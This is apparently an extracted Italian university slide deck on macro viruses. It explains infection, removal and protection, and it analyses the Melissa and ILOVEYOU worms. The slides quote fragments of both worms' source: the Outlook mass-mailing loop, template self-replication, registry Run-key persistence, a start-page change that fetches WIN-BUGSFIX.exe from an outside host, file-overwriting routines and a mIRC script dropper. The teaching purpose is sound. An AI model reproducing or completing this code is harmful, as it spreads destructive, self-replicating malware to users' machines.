Comments
Transcript
Macro Virus - Dipartimento di Informatica
Macro Virus v v v v Realizzato Da: v v vBruno Marisa vRadica Diego vSessa Clelia MARISA.BRUNO@poste. it diego.radica@libero. diego [email protected] clelia28@interfree clelia28@ interfree.. it Macro Virus 1 v v Che cos’è un virus. Definizione di Macro Virus. Che cos’è una macro. Come agisce un Macro Virus. Problemi causati da Macro Virus. Infezione e Rimozione: 1.Editor 1. Editor di VB attivo. 2.Editor 2. Editor di VB non attivo. Come proteggersi. Trattazione di due Macro Virus: - Melissa. - I love you you.. Macro Virus Che cos’è un virus informatico 2 Diffusione dei virus Programma dotato delle seguenti caratteristiche: ü Deve confondersi alle istruzioni di altri programmi modificandoli. ü Deve essere in grado di replicarsi. ü Dopo un tempo prestabilito, il virus comincia a compiere l’azione per cui è stato scritto (es.distruggere dati e/o programmi…). La diffusione dei virus informatici nel mondo ad Agosto 2001 in base alla percentuale di infezioni sul totale Bulletin Virus Macro Virus 3 Macro Virus 4 Che cos’è una macro Virus scritti come “macro” di applicazioni utente: - MS Word, Excel, Access,… ü Possono essere eseguiti all’atto dell’apertura di un documento. ü Possono accedere virtualmente a tutte le funzioni del sistema operativo. Macro Virus Macro Virus Le macro sono delle procedure automatizzate che consentono di effettuare diverse operazioni in sequenza. Ad es. se si vuole aggiungere a tutti i documenti in Word una fotografia, si scrive una macro. 5 Macro Virus 6 n 1 Esempio di macro Protezione da macro WORD EXCEL OFFICE AutoOpen Auto_Open Document_Open Document _Open AutoClose Auto_Close Auto_ Close Document__ Close Document ü Le applicazioni Word ed Excel proteggono gli utenti a condizione che sia attiva Protezione da macro. macro . Auto_Exec Auto_ Exec AutoExit AutoNew Document_New Document _New Auto_Active Auto_ Active Auto_Deactive Auto_ Deactive Macro Virus 7 Verifica protezione attivata (1) Macro Virus 8 Verifica protezione attivata (2) In Word 2000 e Excel 2000 Macro Virus 9 Macro Virus 10 Documento contenente una macro Diffusione Posta elettronica Macro Virus 11 Macro Virus 12 n 2 Diffusione dei Macro Virus Macro Virus v v v v v v v v Macro Virus 13 Come agisce un Macro Virus ü ü Modello di foglio bianco caricato ogni volta che si avvia Word üAttacca qualsiasi Pc che ha installato Microsoft Office. ü Possibilità di salvare il documento solo in formato .txt .txt ü Cancellazione di icone ü Occupazione eccessiva di memoria fino al blocco totale del sistema ü Cancellazione di intere directory di files dati ecc… 15 Macro Virus Macro Virus v v v v v v v v Che cos’è un virus. Definizione di Macro Virus. Che cos’è una macro. Come agisce un Macro Virus. Problemi causati da Macro Virus. Infezione e Rimozione: 1.Editor 1. Editor di VB attivo. 2.Editor 2. Editor di VB non attivo. Come proteggersi. Trattazione di due Macro Virus: - Melissa. - I love you you.. Macro Virus 14 Problemi causati dai Macro Virus Disattiva la Protezione da virus di macro. Quando si apre Word si crea una copia del Normal Normal.. dot che se infetto duplica anche il macro virus. Macro Virus Che cos’è un virus. Definizione di Macro Virus. Che cos’è una macro. Come agisce un Macro Virus. Problemi causati da Macro Virus. Infezione e Rimozione: 1.Editor 1. Editor di VB attivo. 2.Editor 2. Editor di VB non attivo. Come proteggersi. Trattazione di due Macro Virus: - Melissa. - I love you you.. Macro Virus 16 Infezione Documento non infetto File Header Documento infetto File Header System Data (Directory FAT) System Data (Directory FAT) Testo Fonts Testo Fonts Macro (se presente) Macro (se presente) MACRO VIRUS Altri Dati Altri Dati 17 Macro Virus 18 n 3 Algoritmo per il controllo infezione Strumenti/opzioni/standard/attiva protezione da macro Non Attiva Categorie di infezione 1. Attiva Possibilità infezione BASSE!!! Strumenti/macro/editor di VB 2. Attiva Strumenti/Macro/Editor di VB Non attivo! Il macro virus c’è ma l’editor di VB E’ attivo! Non Attiva Al 99% Macro Virus 19 Macro Virus Rimozione (1) 20 Rimozione (2) Eliminare Normal Normal.. dot Individuare in normal il codice virale e cancellarlo Editor di VB è attivo! Editor di VB non attivo! Salvare le modifiche al modello Sostituirlo con uno pulito Attivare protezione Aprire files Word (uno alla volta) Attivare protezione Compare finestra Attiva macro SI Disattivare macro Aprire files Word (uno alla volta) Compare finestra Attiva macro SI Cancellare il codice virale Cancellare il codice virale NO NO Documento successivo Salvare il file con un altro nome Documento successivo Eliminare il vecchio file Macro Virus ü Salvare il file con un altro nome Eliminare il vecchio file 21 Macro Virus Come proteggersi ü Disattivare macro 22 Antivirus Ø http://www.antivirus. http://www.antivirus.com com DIFFIDARE !!! Antivirus. Ø Ø Ø Ø Macro Virus 23 http://www.f- secure http://www.fsecure..com http://www. gnd gnd..it it/~ /~agalli agalli/software/antivirus. /software/antivirus. htm http://www.mcafee http://www. mcafee-- at at-- home. home.com com http://www.symantec http://www. symantec..com Macro Virus 24 n 4 Macro Virus v v v v v v v v Che cos’è un virus. Definizione di Macro Virus. Che cos’è una macro. Come agisce un Macro Virus. Problemi causati da Macro Virus. Infezione e Rimozione: 1.Editor 1. Editor di VB attivo. 2.Editor 2. Editor di VB non attivo. Come proteggersi. Trattazione di due Macro Virus: - Melissa. - I love you you.. Macro Virus Alias: Simpson Simpson,, Kwyjibo Kwyjibo,, Kwejeebo Kwejeebo,, Mailissa,, W97M.Melissa Mailissa L’autore : David Lee Smith ANNO DANNI 1999 $1.10 Billion 25 Macro Virus 26 Computer Economics Diffusione e attivazione Melissa Macro Virus scritto in VBA che si diffonde attraverso ee-mail. Si replica sotto MS Word 8 e 9 (Office 97 e Office 2000). Macro Virus 27 Attraverso ee-mail con un file list.doc list.doc;; Viene spedito ai primi 50 nomi in rubrica (ma se tra di essi c’è una mailing list arriva a tutti quelli che sono abbonati); ü Si attiva con determinate combinazioni della data e ora (procedura trigger routine); ü Macro Virus 28 Modifica del Registro di configurazione Caratteristiche dell’edell’e - mail Macro Virus ü 29 Macro Virus 30 n 5 Il Codice Trasmissione Nome della macro infetta Private Sub Document_Open() On Error Resume Next End Sub If UngaDasOutlook = "Outlook" Then DasMapiName .Logon "profile ", "password“ "password“ For y = 1 To DasMapiName. AddressLists AddressLists.Count .Count Set AddyBook = DasMapiName. AddressLists AddressLists(y) (y) x=1 Set BreakUmOffASlice = UngaDasOutlook UngaDasOutlook.. CreateItem (0) Si autospedise ai primi 50 For oo = 1 To AddyBook AddyBook.. AddressEntries AddressEntries.Count .Count indirizzi della rubrica Peep = AddyBook AddyBook.. AddressEntries AddressEntries(x) (x) BreakUmOffASlice.Recipients.Add BreakUmOffASlice .Recipients.Add Peep x=x+1 If x > 50 Then oo = AddyBook AddyBook.. AddressEntries AddressEntries.Count .Count Next oo BreakUmOffASlice.Subject BreakUmOffASlice .Subject = "Important Message From " & Application. UserName BreakUmOffASlice.Body BreakUmOffASlice .Body = "Here is that document you asked for ... don't show anyone anyone else ;;-)" BreakUmOffASlice.Attachments.Add BreakUmOffASlice .Attachments.Add Allega il documento infetto alla mail ActiveDocument. FullName BreakUmOffASlice.Send BreakUmOffASlice .Send Peep = "" Spedisce ee-mail Next y DasMapiName.Logoff Setta il flag di Melissa installato nei registri di Windows End If Ignora gli errori causati da Melissa quando è in esecuzione Neutralizza le difese di Word contro le Macro Macro Virus 31 Macro\Virus System.PrivateProfileString System. PrivateProfileString("", ("", "HKEY_CURRENT_USER Software \ Microsoft \ Office \ ", "Melissa?") = "... by32Kwyjibo Kwyjibo"" End If Replicazione e Infezione Replicazione e Infezione … Set ADI1 = ActiveDocument . VBProject . VBComponents VBComponents.. Item Item(1) (1) Set NTI1 = NormalTemplate . VBProject. VBComponents VBComponents.. Item Item(1) (1) NTCL = NTI1. CodeModule CodeModule.. CountOfLines ADCL = ADI1.CodeModule CodeModule .CountOfLines BGN = 2 If ADI1. ADI1.Name Name <> "Melissa" Then If ADCL > 0 Then ADI1. ADI1.CodeModule CodeModule . DeleteLines DeleteLines1, 1, ADCL Set ToInfect = ADI1 ADI1.Name ADI1. Name = "Melissa" Infetta il documento corrente o quello DoAD = True End If di default come infetto … Macro Virus usato If DoNT = True Then Do While ADI1.CodeModule. CodeModule. Lines Lines(1, (1, 1) = "" ADI1.CodeModule ADI1. CodeModule . DeleteLines DeleteLines11 Loop ToInfect .CodeModule . AddFromString ("Private Sub Document Document__Close Close()") ()") Do While ADI1.CodeModule. CodeModule. Lines Lines(BGN, (BGN, 1) <> "" ToInfect .CodeModule .InsertLines InsertLinesBGN, BGN, ADI1.CodeModule CodeModule .Lines Lines(BGN, (BGN, 1) BGN = BGN + 1 Loop End If Copia il virus linea per linea nella macro Document Document__Close 33 Macro Virus Replicazione e Infezione 34 Replicazione e Infezione … CYA: If DoAD = True Then Do While NTI1. NTI1.CodeModule CodeModule.. Lines Lines(1, (1, 1) = "" NTI1.CodeModule NTI1. CodeModule.. DeleteLines 1 Loop ToInfect.. CodeModule ToInfect CodeModule.. AddFromString ("Private Sub Document_Open()") Document _Open()") Do While NTI1. NTI1.CodeModule CodeModule.. Lines Lines(BGN, (BGN, 1) <> "" ToInfect.. CodeModule ToInfect CodeModule.. InsertLines BGN, NTI1.CodeModule NTI1. CodeModule.. Lines Lines(BGN, (BGN, 1) BGN = BGN + 1 Loop End If If NTCL <> 0 And ADCL = 0 And (InStr (InStr(1, (1, ActiveDocument ActiveDocument.. Name Name,, "Document "Document ") = False) Then ActiveDocument.. SaveAs FileName:= ActiveDocument FileName:=ActiveDocument ActiveDocument.. FullName ElseIf (InStr InStr(1, (1, ActiveDocument ActiveDocument.. Name Name,, "Document "Document") ") <> False) Then ActiveDocument.. Saved = True ActiveDocument Salva il documento infetto End If Copia il virus linea per linea nella macro Document Document_Open _Open 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm?? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Worm 'Word -> Email | Word 97 <-<-- > Word 2000 ... it's a new age age!! Commenti Macro Virus 35 Macro Virus 36 n 6 Trigger Routine Trigger routine … If Day( Day(Now Now)) = Minute(Now Minute(Now)) Then Selection. Selection. TypeText " Twenty Twenty--two points , plus triple--word -score, plus fifty points for using all my letters . Game's over. I'm triple outta here." here." End Sub Se il giorno del mese è uguale ai minuti dell’ora ,stampa un messaggio Macro Virus 37 Macro Virus Come determino se si è infettati ü Antivirus Esegui regedit regedit..exe Ø http://www.antivirus. http://www.antivirus.com com Ø Ø Ø ü 38 Determinare la presenza dell’ “ospite” Macro Virus Ø http://www.f- secure http://www.fsecure..com http://www. gnd gnd..it it/~ /~agalli agalli/software/antivirus. /software/antivirus. htm http://www.mcafee http://www. mcafee-- at at-- home. home.com com http://www.symantec http://www. symantec..com 39 Macro Virus 40 Varianti MELISSA.B Ogg.messaggio Ogg.messaggio Testo messaggio Allegato messaggio Caratteristiche "Trust no one(nome di chi invia il messaggio)“ Be careful what you open, it could be a virus Un documento infettato dal virus Invia una copia di se stesso al primo indirizzo di Outlook MELISSA.C Ogg.messaggio Ogg.messaggio Testo messaggio Allegato messaggio Caratteristiche "Fun and games from (nome di chi invia il messaggio)“ HI! Check out this neat doc I found on the internet! Un documento infettato dal virus Invia una copia di se stesso ai primi 69 indirizzi di Outlook MELISSA.D Ogg.messaggio Ogg.messaggio Testo messaggio Allegato messaggio Caratteristiche "Mad Cow Joke (nome di chi invia il messaggio)“ Beware of the spread of the Madcow disease Un documento infettato dal virus Invia una copia di se stesso ai primi 20 indirizzi di Outlook Macro Virus Alias: LoveLetter LoveLetter,, Lovebug Lovebug,, I-Worm Worm.. LoveLetter L’autore : 41 ANNO DANNI 2000 $8.75 Billion Computer Economics Macro Virus 42 n 7 I Love You Dove Funziona Internet worm scritto in VBScript per WSH che si diffonde attraverso ee-mail create con Microsoft Outlook. ü Sistemi Windows dove è presente WSH (installato per default in Windows 98/2000) ü Sistemi dove è installato Internet Explorer 5.x Più pericoloso di Melissa, perché si spedisce a tutti i contatti della Rubrica. Macro Virus 43 Diffusione ü ü Macro Virus 44 Il codice Posta elettronica mIRC Il primo commento inserito nel codice sorgente è: rem barok –loveletter loveletter((vbe vbe)) <i hate go to school> school> rem by : spyder / ispyder ispyder@mail. @mail.com com / @GRAMMERSoft @GRAMMERSoft Group / Manila, Philippines Macro Virus 45 Il codice v regruns regruns() () v listadriv listadriv() () v infectfiles infectfiles((folderspec ) v folderlist (folderspec folderspec)) regvalue)) regvalue v spreadtoemail spreadtoemail() () v html html() () v regcreate regcreate((regkey regkey,, Macro Virus 46 main() main () Imposta alcune variabili usate nelle successive routine e crea tre files files.. v main() Macro Virus 47 … wscr= wscr =CreateObject CreateObject(" ("WScript WScript.Shell") .Shell") rr= rr =wscr wscr..RegRead RegRead("HKEY_CURRENT_USER ("HKEY_CURRENT_USER\\Software \Microsoft Microsoft\\Windo ws ScriptingHost ScriptingHost\\Settings Settings\\ Timeout") if (rr (rr>=1) >=1) then wscr..RegWrite "HKEY_CURRENT_USER wscr "HKEY_CURRENT_USER\\Software \Microsoft Microsoft\\Windows ScriptingHost\\Settings \Timeout",0,"REG_DWORD ScriptingHost Timeout",0,"REG_DWORD“ “ Creazione files end if • MSKernel32. vbs …. • Win32DLL. vbs c.Copy(dirsystem c.Copy( dirsystem&" &"\\MSKernel32. MSKernel32.vbs vbs") ") • LOVE LOVE--LETTER -FOR FOR-c.Copy(dirwin c.Copy( dirwin&" &"\\Win32DLL. Win32DLL.vbs vbs") ") YOU.TXT.vbs YOU.TXT. vbs c.Copy(dirsystem c.Copy( dirsystem&" &"\\LOVE LOVE-- LETTER LETTER-- FOR FOR-- YOU.TXT. YOU.TXT.vbs vbs") ") … Macro Virus 48 n 8 Il codice regruns() regruns () •Inserisce nel registro due chiavi •Individua la directory per scaricare dei files da Internet. Modifica la pagina iniziale di MS Internet Explorer Explorer.. v main() v regruns regruns() () v listadriv listadriv() () v infectfiles infectfiles((folderspec ) v folderlist (folderspec folderspec)) regvalue)) regvalue v spreadtoemail spreadtoemail() () v html html() () v regcreate regcreate((regkey regkey,, Macro Virus … regcreate"HKEY_LOCAL_MACHINE regcreate "HKEY_LOCAL_MACHINE\\Software Software\\Microsoft Microsoft\\Wi ndows\\CurrentVersion ndows CurrentVersion\\Run Run\\MSKernel32 MSKernel32", ",dirsystem dirsystem& & "\ "\MS Kernel32.vbs Kernel32. vbs“ “ regcreate"HKEY_LOCAL_MACHINE regcreate "HKEY_LOCAL_MACHINE\\Software Software\\Microsoft Microsoft\\Wi ndows\\CurrentVersion ndows CurrentVersion\\RunServices RunServices\\Wi Win32DLL n32DLL“ “, dirwin dirwin& &" \Win32DLL. Win32DLL.vbs vbs“ “ … Inserisce nel registro due chiavi che fanno eseguire all’avvio del sistema i due script: MSKernel32.vbs MSKernel32.vbs Win32DLL.vbs Win32DLL. vbs 49 Macro Virus 50 regruns() regruns () regruns() regruns () … downread=" downread ="“ “ downread= downread =regget regget("HKEY_CURRENT_USER ("HKEY_CURRENT_USER\\Software \Microsoft Microsoft\\Internet Explorer\\Download Directory") Explorer if (downread (downread="") ="") then Individua la directory downread="c: downread ="c:\\“ impostata per lo scaricamento dei files end if da Internet … … if (fileexist (fileexist(( dirsystem dirsystem&" &"\\WinFAT32.exe")=1) then Randomizenum = Int Int((4 ((4 * Rnd Rnd)) + 1) if num = 1 then regcreate "HKCU "HKCU\\Software \Microsoft Microsoft\\Internet Explorer\ Explorer\Main Main\\Start Page","http://www.skyinet Page","http://www. skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwe .net/~young1s/HJKhjnwerhjkxcvytwertnMTFwe trdsfmhPnjw6587345gvsdf7679njbvYT/WIN trdsfmhPnj w6587345gvsdf7679njbvYT/WIN-- BUGSFIX.exe" … Macro Virus 51 Macro Virus regruns() regruns () Se esiste WinFAT32.exe WinFAT32.exe il worm modifica (attraverso il registro) la pagina iniziale di MS Internet Explorer inserendo la URL del file WINWINBUGFIX.EXE del sito www.skyinet www. skyinet.net .net 52 Il codice … if (fileexist (fileexist(( downread downread&" &"\\WIN WIN-- BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE "HKEY_LOCAL_MACHINE\\Software \Microsoft Microsoft\\Windows Windows\\Curr entVersion\\Run entVersion Run\\WIN WIN-- BUGSFIX", BUGSFIX",downread downread&" &"\\WIN WIN-- BUGSFIX.exe BUGSFIX.exe“ “ regcreate "HKEY_CURRENT_USER "HKEY_CURRENT_USER\\Software \Microsoft Microsoft\\Internet Explorer\\Main Explorer Main\\StartPage StartPage","about:blank ","about:blank“ “ end if v main() Analizza i drives presenti nel disco e per ogni unità esegue la funzione folderlist v regruns regruns() () v listadriv listadriv() () v infectfiles infectfiles((folderspec ) v folderlist (folderspec folderspec)) regvalue)) regvalue v spreadtoemail spreadtoemail() () v html html() () v regcreate regcreate((regkey regkey,, Verifica l’ esistenza di WINWIN- BUGFIX. BUGFIX.exe exe e imposta il registro per eseguirlo ad ogni avvio del computer. La pagina iniziale di IE diventa “about “about::blank blank”” Macro Virus 53 Macro Virus 54 n 9 Il codice Modifica i files files:: infectfiles((folderspec infectfiles folderspec)) • Script • Fogli di stile •JPEG, MP3, MP2 v main() v regruns regruns() () Sovrascrive i files con una copia del worm worm.. Cerca il software mIRC v listadriv listadriv() () per inviare pagina html contenente copia del worm v infectfiles infectfiles((folderspec ) v folderlist (folderspec folderspec)) regvalue)) regvalue v spreadtoemail spreadtoemail() () v html html() () v regcreate regcreate((regkey regkey,, Macro Virus … if (ext="vbs (ext="vbs") ") or (ext="vbe (ext="vbe") ") then set ap ap= = fso fso.. OpenTextFile OpenTextFile(f1.path,2,true) (f1.path,2,true) ap.write ap .write vbscopyap .close elseif(ext=" elseif (ext="js js") ") or (ext="jse (ext="jse") ") or (ext="css (ext="css") ") or (ext="wsh (ext="wsh") ") or (ext="sct (ext="sct")or ")or (ext="hta (ext=" hta") ") then set ap ap= = fso fso.. OpenTextFile OpenTextFile(f1.path,2,true) (f1.path,2,true) ap.write ap .write vbscopy Individua tutti i files con script o ap.close ap .close fogli di stile (*. (*.vbs vbs,, bname= bname = fso fso.. GetBaseName GetBaseName(f1.path) (f1.path) *.vbe *. vbe,, set cop=fso cop=fso.. GetFile GetFile(f1.path) (f1.path) *.js *. js,*. ,*.jse jse,*. ,*.css css,*. ,*.ws ws cop.copy(folderspec cop.copy( folderspec&" &"\\"& "&bname bname&". &".vbs vbs") ") h ,*. ,*.sct sct,*. ,*.hta hta)) fso.. DeleteFile fso DeleteFile(f1.path) (f1.path) … 55 Macro Virus 56 infectfiles((folderspec infectfiles folderspec)) infectfiles((folderspec infectfiles folderspec)) elseif(ext="jpg elseif(ext=" jpg") ") or (ext="jpeg") then setap= setap =fso fso..OpenTextFile (f1.path,2,true) (f1.path,2,true)ap ap.write .write vbscopy ap.close ap .close Le immagini JPEG(*.jpg JPEG(*. jpg,*. ,*.jpeg jpeg ) e i set cop=fso cop=fso..GetFile (f1.path) fileMP3 e MP2 vengono cop.copy(f1.path&".vbs cop.copy(f1.path&". vbs") ") sovrascritti da un file con fso..DeleteFile (f1.path) fso lo stesso nome con estensione *. vbs e come elseif(ext="mp3") elseif (ext="mp3") or (ext="mp2") then contenuto una copia del set mp3=fso mp3=fso..CreateTextFile (f1.path&". (f1.path&".vbs vbs") ") worm mp3.write vbscopy mp3.close … if (eq (eq<> <>folderspec folderspec)) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc (s="mirc .ini ini") ") or(s="script.ini or(s="script.ini") ") or (s="mirc (s=" mirc .hlp hlp") ") then set scriptini= scriptini =fso fso..CreateTextFile ( folderspec folderspec&" &"\\script. script.ini ini") ") scriptini..WriteLine "[script] scriptini "[script]«« scriptini..WriteLine "; scriptini ";mIRC mIRC Script Script«« scriptini..WriteLine "; Please dont edit this script... mIRC will corrupt, scriptini if mIRC will will” ” Cerca il software mIRC e crea nella sua cartella il file … “SCRIPT.INI”, che contiene i comandi per inviare una pagina html contenente la copia del worm worm.. Macro Virus 57 Macro Virus Il codice 58 Il codice v main() v main() v regruns regruns() () v regruns regruns() () v listadriv listadriv() () v infectfiles infectfiles((folderspec ) Chiama infectfiles(( folderspec infectfiles folderspec)) (folderspec folderspec)) regvalue)) regvalue v spreadtoemail spreadtoemail() () v html html() () v listadriv listadriv() () v infectfiles infectfiles((folderspec ) v folderlist v folderlist v regcreate regcreate((regkey regkey,, v regcreate regcreate((regkey regkey,, Macro Virus Imposta i registri (folderspec folderspec)) regvalue)) regvalue v spreadtoemail spreadtoemail() () v html html() () 59 Macro Virus 60 n 10 Il codice Caratteristiche dell’edell’e - mail v main() v regruns regruns() () v listadriv listadriv() () v infectfiles infectfiles((folderspec ) Legge gli indirizzi ee-mail nella rubrica e prepara per ognuno l’el’e-mail Oggetto: ILOVEYOU. Contenuto: kindly check the attached LOVELETTER coming from me. Allegato: LOVE LOVE-- LETTER LETTER-- FOR FOR-- YOU.TXT. YOU.TXT.vbs vbs.. v folderlist (folderspec folderspec)) regvalue)) regvalue v spreadtoemail spreadtoemail() () v html html() () v regcreate regcreate((regkey regkey,, Macro Virus 61 Il codice Macro Virus 62 Creazione pagina HTML v main() v regruns regruns() () v listadriv listadriv() () v infectfiles infectfiles((folderspec ) v folderlist (folderspec folderspec)) regvalue)) regvalue Crea una pagina HTML v spreadtoemail spreadtoemail() () contenente codice virale nella directory di Windows. v html html() () v regcreate regcreate((regkey regkey,, Macro Virus Utilizzata per infezione attraverso mIRC mIRC.. 63 Come proteggersi ü ü ü 64 Impostazione di Outlook Impostare il client di posta elettronica (ad es. Outlook), in modo da non aprire il messaggio in anteprima. Creazione regola di posta. Controllare gli allegati (prima dell’ dell’ apertura!) con un antivirus. Macro Virus Macro Virus Visualizza - Visualizzazione corrente Visualizzadeselezionare Messaggi con Anteprima. 65 Macro Virus 66 n 11 Creazione regola di posta Creazione regola di posta Strumenti--Regole MessaggiStrumenti Messaggi- Posta Elettronica Macro Virus 67 Macro Virus Creazione regola di posta Macro Virus 68 Creazione regola di posta 69 Macro Virus Creazione regola di posta 70 Antivirus Ø http://www.antivirus. http://www.antivirus.com com Ø Ø Ø Ø Macro Virus 71 http://www.f- secure http://www.fsecure..com http://www. gnd gnd..it it/~ /~agalli agalli/software/antivirus. /software/antivirus. htm http://www.mcafee http://www. mcafee-- at at-- home. home.com com http://www.symantec http://www. symantec..com Macro Virus 72 n 12 Rimozione Varianti ü File ".VBS" da tutte le cartelle di tutti i drive. ü File LOVELOVE- LETTER LETTER--FOR FOR-- YOU.HTM dalla cartella di sistema di Windows. ü File WINWIN- BUGSFIX.EXE e WINFAT32.EXE dalla cartella dei file scaricati di Internet Explorer Explorer.. ü Per mIRC mIRC,, cancellare il file "script.ini "script.ini"" dalla cartella dove è installato mIRC mIRC.. Macro Virus 73 Conclusione CONTENUTO ALLEGATO US PRESIDENT AND “VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES..” President.. vbs President FBI SECRETS JOKE MOTHERS DAY <nessuno> Very Funny. Funny .vbs We have proceeded to change your credit card Mothersday . vbs for the amount of $326.92 … Macro Virus 74 ANNOTAZIONE Questo lavoro è stato preparato a scopo puramente didattico!!! Il contagio si è propagato solo attraverso il software di posta della Microsoft… Diversificare non fa altro che rafforzare, mentre l’uniformità provoca l’indebolimento. Macro Virus OGGETTO A fronte delle conoscenze date è stato evidenziato l’aspetto della prevenzione e della rimozione. Pertanto il codice riportato è stato modificato ed è incompleto; non ci assumiamo nessuna responsabilità dell’utilizzo improprio di questo lavoro!!! 75 Macro Virus 76 n 13